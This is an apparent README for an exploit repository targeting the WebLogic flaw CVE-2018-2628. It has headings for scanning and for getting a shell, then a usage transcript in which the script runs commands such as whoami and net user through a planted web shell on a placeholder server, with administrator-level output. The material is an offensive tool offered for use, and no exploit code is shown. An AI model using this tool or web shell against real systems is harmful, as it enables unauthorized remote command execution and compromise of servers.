# CVE-2018-2628
### 0x01 Nessus Scan

### 0x02 K8 Tools GetShell

### 0x03 CMD Query

##### Use-Method:
```
> python cve-2018-2628.py
set url :http://xx.xx.xx.xx:8001/bea_wls_internal/wlscmd.jsp
cmd >>: whoami
win-xxx8cb989qh\administrator
cmd >>: net user
\\WIN-XXX8CB989QH 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest
命令成功完成。
cmd >>:
```
[4.0K] /data/pocs/a8738cb75bc466e56879c551f025dbba77741221
├── [ 915] cve-2018-2628.py
├── [4.0K] images
│ ├── [260K] cmd.jpg
│ ├── [275K] CVE-2018-2628-scan.jpg
│ └── [110K] GetShell.PNG
├── [ 52] push.sh
└── [ 538] README.md
1 directory, 6 files